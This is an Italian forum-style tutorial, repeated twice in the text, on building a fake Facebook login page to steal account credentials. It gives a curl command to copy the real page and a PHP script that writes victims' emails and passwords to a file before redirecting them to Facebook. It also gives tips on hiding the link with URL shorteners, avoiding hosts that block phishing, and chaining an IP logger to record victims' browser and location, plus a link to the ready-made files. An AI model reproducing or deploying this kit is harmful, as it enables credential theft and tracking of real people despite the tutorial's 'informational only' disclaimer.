Perche' nasce questa guida:
Da poco, c'e' stato un fluente aumento di domande riguardanti i fake login, o meglio copie [il piu' possibile simili agli originali] field di login che servono per condurre attacchi di phishing.
Cio' che mi spinge a scrivere questa guida, non e' tanto il "come fare" [ce ne sono di modi migliori di questo], ma far capire come cio' che fanno i tool automatizzati e gia' sfornati [che possiamo trovare in kali o parrot], lavorano come un umano in modo intelligente, e per tanto non c'e' bisogno esclusivamente di questi per poter creare un fake login.
Come procederemo:
Il tutto sara' provato sul sito di cui piu' si parla riguardo a metodi per ottenere pass di account e credenziali: facebook .
Questa guida e' a solo scopo informativo e non mi assumo nessuna responsabilita' dell uso che ne farete. Detto cio' , cominciamo !!! :
Requisiti:
In primis dobbiamo ottenere il codice html del sito [nel nostro caso facebook]; Per fare cio' ci sono 2 modi:
, ma se cliccherete sull icona in alto a sinistra, o su login, verrete rimandati alla pagina principale di facebbok, mentre noi vogliamo salvare le credenziali immesse in un file, e solo dopo rimandare alla pagina principale di facebook ...... Dobbiamo quindi modificare il codice nel seguente modo:
aprite il file facebook.html [con il codice che avete ottenuto con uno dei 2 passaggi di sopra] e cercate il seguente testo che sara' quello dal quale cominciare a modificare:
Cosi' facendo potrete ottenere l' action predefinita di facebook, che non e' altro che un redirect alla pagina /login.php [vedete in foto quello sottolineato in rosso]:
,proprio il testo sottolineato in rosso, e' quello che ora dobbiamo andare a modificare;
Al posto di:
inserite l url del vostro server che conterra' il seguente script php che e' di per se il cuore di questa operazione:
copiate quindi il seguente codice:
e salvate il tutto nel file post.php.
Uppate ora il file nel vostro server [nel mio caso xampp] e ottenete cosi' il suo url che dovrete sostituire nel file html:
ora avete pronto il tutto: uppate anche la pagina in html nel server come index.html in una cartella non sospetta, e attendete che la vittima inserisca il tutto: se tutto va bene dovreste arrivare a qualcosa del genere:
, come potete vedere il tutto funge alla perfezione, e possiamo visionare in chiaro sia la pass che la mail........alla fine della sovrascrittura del file inoltre, lo script .php rimanda alla vera pagina del login di facebook, facebdo sembrare tutto un banale errore........o forse no ??!
Piccole note:
Per fare una cosa del genere in remoto, dovete aver forwardato il server, inoltre un utente leggermente sveglio .... vedrebbe che l url non e' quello del solito login, quindi mandate sempre tramite url shortato.
Una piccola raccomandazione: non uppate cio' su siti come altervista or other, questo perche' il sito dopo 30 minuti sara' dichiarato inagibile e pericoloso:
. Spero la guida vi sia piaciuta
Ma soprattutto, non fate i : non otterrete nulla eccetto che una bella denuncia se vi scoprono !!, cosa piuttosto semplice perche' basta vedere l url alterato ...... e analizzare il codice della pagina:
PS: Nel post.php, prima di redirectare alla pagina vera e propria dopo aver sovrascritto le credenziali, potreste anche ottenere molte piu' info sulla vittima [ad esempio browser,hostname, localita' [approssimata] e sistema operativo attraverso un semplice metodo:
Andate sul sito http://blasze.com o su https://iplogger.com/ e create un url che redirecti alla pagina facebook.com dopo aver catturato le info sulla vittima; Sostituie quindi nel file post.php, l' url facebook.com con l' url che verra' generato poi procedete con il resto ...... appena la vittima premera' login, verra' redirectata all iplogger e poi al sito voluto, lasciando cosi' anche piu' informazioni su di se !!!
Il codice interno allo script post.php dovrebbe essere simile a :
Sotto richiesta, allego inoltre il file contenente tutti i file usati nel tutorial [come li vedete nella release];
NB: Nel file sono settati come nella cartella localhost/fakeloginfacebook/ [usando xampp su win...], quindi bisognera' modificare, come potete seguire dalla release, l' indirizzo dell host contenente i file del fake login;
URL con allegato: https://ufile.io/tchj5
Da poco, c'e' stato un fluente aumento di domande riguardanti i fake login, o meglio copie [il piu' possibile simili agli originali] field di login che servono per condurre attacchi di phishing.
Cio' che mi spinge a scrivere questa guida, non e' tanto il "come fare" [ce ne sono di modi migliori di questo], ma far capire come cio' che fanno i tool automatizzati e gia' sfornati [che possiamo trovare in kali o parrot], lavorano come un umano in modo intelligente, e per tanto non c'e' bisogno esclusivamente di questi per poter creare un fake login.
Come procederemo:
Il tutto sara' provato sul sito di cui piu' si parla riguardo a metodi per ottenere pass di account e credenziali: facebook .
Questa guida e' a solo scopo informativo e non mi assumo nessuna responsabilita' dell uso che ne farete. Detto cio' , cominciamo !!! :
Requisiti:
- Un computer con installato un server [ove hosteremo il tutto]
- Minima conoscenza di come funga un login
- Blocco note
- Terminale [con il quale copieremo il codice html della pagina]
- ed utlimo ma non per importanza: un cervello funzionante
In primis dobbiamo ottenere il codice html del sito [nel nostro caso facebook]; Per fare cio' ci sono 2 modi:
- Copiare manualmente il tutto dal pannello developer tool del browser al quale potete accedere andando su "opzioni" [spesso identificate come 3 quadratini] > developer tool > elements
- Aprire il terminale e digitare il seguente comando:
Bash:
curl -q https://www.facebook.com/login.php > facebook.html
aprite il file facebook.html [con il codice che avete ottenuto con uno dei 2 passaggi di sopra] e cercate il seguente testo che sara' quello dal quale cominciare a modificare:
Codice:
Accedi a Facebook</span></div><div class="login_form_container"><form id="login_form" action="
Cosi' facendo potrete ottenere l' action predefinita di facebook, che non e' altro che un redirect alla pagina /login.php [vedete in foto quello sottolineato in rosso]:
Al posto di:
Codice:
/login.php?login_attempt=1&lwv=100
copiate quindi il seguente codice:
Codice:
<?php $file = 'credential.txt';file_put_contents($file, print_r($_POST, true), FILE_APPEND);?><meta http-equiv="refresh" content="0; url=https://login.facebook.com/login.php" />
Uppate ora il file nel vostro server [nel mio caso xampp] e ottenete cosi' il suo url che dovrete sostituire nel file html:
Piccole note:
Per fare una cosa del genere in remoto, dovete aver forwardato il server, inoltre un utente leggermente sveglio .... vedrebbe che l url non e' quello del solito login, quindi mandate sempre tramite url shortato.
Una piccola raccomandazione: non uppate cio' su siti come altervista or other, questo perche' il sito dopo 30 minuti sara' dichiarato inagibile e pericoloso:
Ma soprattutto, non fate i : non otterrete nulla eccetto che una bella denuncia se vi scoprono !!, cosa piuttosto semplice perche' basta vedere l url alterato ...... e analizzare il codice della pagina:
PS: Nel post.php, prima di redirectare alla pagina vera e propria dopo aver sovrascritto le credenziali, potreste anche ottenere molte piu' info sulla vittima [ad esempio browser,hostname, localita' [approssimata] e sistema operativo attraverso un semplice metodo:
Andate sul sito http://blasze.com o su https://iplogger.com/ e create un url che redirecti alla pagina facebook.com dopo aver catturato le info sulla vittima; Sostituie quindi nel file post.php, l' url facebook.com con l' url che verra' generato poi procedete con il resto ...... appena la vittima premera' login, verra' redirectata all iplogger e poi al sito voluto, lasciando cosi' anche piu' informazioni su di se !!!
Il codice interno allo script post.php dovrebbe essere simile a :
PHP:
<?php $file = 'credential.txt';file_put_contents($file, print_r($_POST, true), FILE_APPEND);?><meta http-equiv="refresh" content="0; url=http//www.iplogger.com/....[dovrete mettere l' url generato]" />
Sotto richiesta, allego inoltre il file contenente tutti i file usati nel tutorial [come li vedete nella release];
NB: Nel file sono settati come nella cartella localhost/fakeloginfacebook/ [usando xampp su win...], quindi bisognera' modificare, come potete seguire dalla release, l' indirizzo dell host contenente i file del fake login;
URL con allegato: https://ufile.io/tchj5